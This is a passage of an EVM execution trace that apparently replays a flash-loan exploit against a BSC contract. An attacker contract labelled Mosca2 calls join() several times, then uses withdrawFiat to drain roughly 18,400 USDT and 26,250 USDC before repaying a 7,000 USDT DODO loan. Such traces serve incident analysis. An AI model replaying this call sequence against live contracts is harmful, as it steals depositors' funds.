    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564035457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x00000000000000000000000000000000000000000000004fcc1a89027f000000 → 0x0000000000000000000000000000000000000000000000504900f55361840000
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff27a5bfb5396803ffff → 0xffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857fffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000a48e9c2900f5e1a275 → 0x0000000000000000000000000000000000000000000000a411b5bcb0135da275
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c7: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 17: 0x00000000000000000000000000000000000000000000010ddba0b16cf6880000 → 0x000000000000000000000000000000000000000000000144116a5f32d5280000
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x0000000000000000000000000000000000000000000001532a83d4d39660221b → 0x0000000000000000000000000000000000000000000002ce6d90f1e16eae3718
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000002abee068d14b4b1c7 → 0x00000000000000000000000000000000000000000000000334a8217c1d346111
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff5d5ea2f6ae641fffff → 0xffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857fffff
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x000000000000000000000000000000000000000000000000cd1728668cbf86ef → 0x000000000000000000000000000000000000000000000001117435de10ff5e94
    │   │   │   │   │   @ 10: 287 → 288
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564034466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857fffff → 0xfffffffffffffffffffffffffffffffffffffffffffffef16ff607738963ffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000a411b5bcb0135da275 → 0x00000000000000000000000000000000000000000000006e58d27b3b1741a275
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x0000000000000000000000000000000000000000000003440abde6dd9b076d94 → 0x000000000000000000000000000000000000000000000379c3a1285297236d94
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564034457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffef16ff607738963ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffef0f30f9b22a6dfffff
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x0000000000000000000000000000000000000000000000504900f55361840000 → 0x000000000000000000000000000000000000000000000050c5e761a444080000
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000006e58d27b3b1741a275 → 0x00000000000000000000000000000000000000000000006ddbec0eea34bda275
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c8: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff2728d948e8857fffff → 0xfffffffffffffffffffffffffffffffffffffffffffffef0f30f9b22a6dfffff
    │   │   │   │   │   @ 17: 0x000000000000000000000000000000000000000000000144116a5f32d5280000 → 0x00000000000000000000000000000000000000000000017a47340cf8b3c80000
    │   │   │   │   │   @ 19: 0x00000000000000000000000000000000000000000000000334a8217c1d346111 → 0x000000000000000000000000000000000000000000000003bd623c6b25b4105b
    │   │   │   │   │   @ 10: 288 → 289
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x000000000000000000000000000000000000000000000001117435de10ff5e94 → 0x00000000000000000000000000000000000000000000000155d14355953f3639
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x0000000000000000000000000000000000000000000002ce6d90f1e16eae3718 → 0x0000000000000000000000000000000000000000000005bf58d3552cd6bbfbe0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564033466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000006ddbec0eea34bda275 → 0x0000000000000000000000000000000000000000000000382308cd7538a1a275
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffef0f30f9b22a6dfffff → 0xfffffffffffffffffffffffffffffffffffffffffffffebb3a2c59adaac3ffff
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x000000000000000000000000000000000000000000000379c3a1285297236d94 → 0x0000000000000000000000000000000000000000000003af7c8469c7933f6d94
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564033457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffebb3a2c59adaac3ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffebabd45ed5cc83fffff
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x000000000000000000000000000000000000000000000050c5e761a444080000 → 0x00000000000000000000000000000000000000000000005142cdcdf5268c0000
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000382308cd7538a1a275 → 0x000000000000000000000000000000000000000000000037a6226124561da275
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 289 → 290
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffef0f30f9b22a6dfffff → 0xfffffffffffffffffffffffffffffffffffffffffffffebabd45ed5cc83fffff
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x00000000000000000000000000000000000000000000000155d14355953f3639 → 0x0000000000000000000000000000000000000000000000019a2e50cd197f0dde
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000003bd623c6b25b4105b → 0x000000000000000000000000000000000000000000000004461c575a2e33bfa5
    │   │   │   │   │   @ 17: 0x00000000000000000000000000000000000000000000017a47340cf8b3c80000 → 0x0000000000000000000000000000000000000000000001b07cfdbabe92680000
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x0000000000000000000000000000000000000000000005bf58d3552cd6bbfbe0 → 0x000000000000000000000000000000000000000000000b960edccd5ee96714d0
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c9: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564032466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffebabd45ed5cc83fffff → 0xfffffffffffffffffffffffffffffffffffffffffffffe850462abe7cc23ffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000037a6226124561da275 → 0x000000000000000000000000000000000000000000000001ed3f1faf5a01a275
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x0000000000000000000000000000000000000000000003af7c8469c7933f6d94 → 0x0000000000000000000000000000000000000000000003e53567ab3c8f5b6d94
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564032457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000001ed3f1faf5a01a275 → 0x0000000000000000000000000000000000000000000000017058b35e777da275
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x00000000000000000000000000000000000000000000005142cdcdf5268c0000 → 0x000000000000000000000000000000000000000000000051bfb43a4609100000
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffe850462abe7cc23ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffe84877c3f96e99fffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xfffffffffffffffffffffffffffffffffffffffffffffebabd45ed5cc83fffff → 0xfffffffffffffffffffffffffffffffffffffffffffffe84877c3f96e99fffff
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000004461c575a2e33bfa5 → 0x000000000000000000000000000000000000000000000004ced6724936b36eef
    │   │   │   │   │   @ 10: 290 → 291
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x0000000000000000000000000000000000000000000000019a2e50cd197f0dde → 0x000000000000000000000000000000000000000000000001de8b5e449dbee583
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x000000000000000000000000000000000000000000000b960edccd5ee96714d0 → 0x00000000000000000000000000000000000000000000172d6411a68c174a82da
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3ca: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 17: 0x0000000000000000000000000000000000000000000001b07cfdbabe92680000 → 0x0000000000000000000000000000000000000000000001e6b2c7688471080000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [19569] 0xd8791F0C10B831B605C5D48959EB763B266940B9::withdrawFiat(18671180855284200248407 [1.867e22], false, 1)
    │   │   │   │   ├─ [6071] 0x55d398326f99059fF775485246999027B3197955::transfer(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 18395252074171625860499 [1.839e22])
    │   │   │   │   │   ├─ emit Transfer(from: 0xd8791F0C10B831B605C5D48959EB763B266940B9, to: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 18395252074171625860499 [1.839e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x0000000000000000000000000000000000000000000003e53567ab3c8f5b6d94 → 1
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000017058b35e777da275 → 0x0000000000000000000000000000000000000000000003e6a5c05e9b06d91008
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000004fc6d517f05d63796
    │   │   │   │   ├─  emit topic 0: 0xaa669d099375b570029afbc4c1d31ab71b7ac682f1196c1f70ba9d62f03fefa7
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000003f42aaf9fb9a0de14570000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000004ced6724936b36eef → 0x00000000000000000000000000000000000000000000000ec7b11547425fde1b
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x00000000000000000000000000000000000000000000172d6411a68c174a82da → 0x000000000000000000000000000000000000000000001339396206d2766c6e83
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000017058b35e777da275 → 0x0000000000000000000000000000000000000000000003e6a5c05e9b06d91008
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x000000000000000000000000000000000000000000000001de8b5e449dbee583 → 0x000000000000000000000000000000000000000000000006daf8afc3a3951d19
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [42248] 0xd8791F0C10B831B605C5D48959EB763B266940B9::withdrawFiat(26648013000000000000000 [2.664e22], false, 0)
    │   │   │   │   ├─ [28739] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transfer(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 26254200000000000000000 [2.625e22])
    │   │   │   │   │   ├─ [27993] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transfer(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 26254200000000000000000 [2.625e22]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xd8791F0C10B831B605C5D48959EB763B266940B9, to: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 26254200000000000000000 [2.625e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000058f3e3777496c8c0000
    │   │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x00000000000000000000000000000000000000000000058f3e3777496c8c0000 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000071dc046ff164d8000
    │   │   │   │   ├─  emit topic 0: 0xaa669d099375b570029afbc4c1d31ab71b7ac682f1196c1f70ba9d62f03fefa7
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000005a497784c46af7480000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 19: 0x00000000000000000000000000000000000000000000000ec7b11547425fde1b → 0x00000000000000000000000000000000000000000000001d0331a3456efade1b
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x000000000000000000000000000000000000000000000006daf8afc3a3951d19 → 0x00000000000000000000000000000000000000000000000df8b8f6c2b9e29d19
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000058f3e3777496c8c0000
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x000000000000000000000000000000000000000000001339396206d2766c6e83 → 0x000000000000000000000000000000000000000000000d94a1e9ba8bc6f7ee83
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, 7000000000000000000000 [7e21])
    │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, value: 7000000000000000000000 [7e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0x00000000000000000000000000000000000000000000340b267c14603036c62d → 0x0000000000000000000000000000000000000000000035869effd4c94696c62d
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000003e6a5c05e9b06d91008 → 0x00000000000000000000000000000000000000000000026b2d3c9e31f0791008
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 242321616220426827935 [2.423e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 252768744407906267874861 [2.527e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 242321616220426827935 [2.423e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 252768744407906267874861 [2.527e23]
    │   │   ├─ emit DODOFlashLoan(: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 7000000000000000000000 [7e21])
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
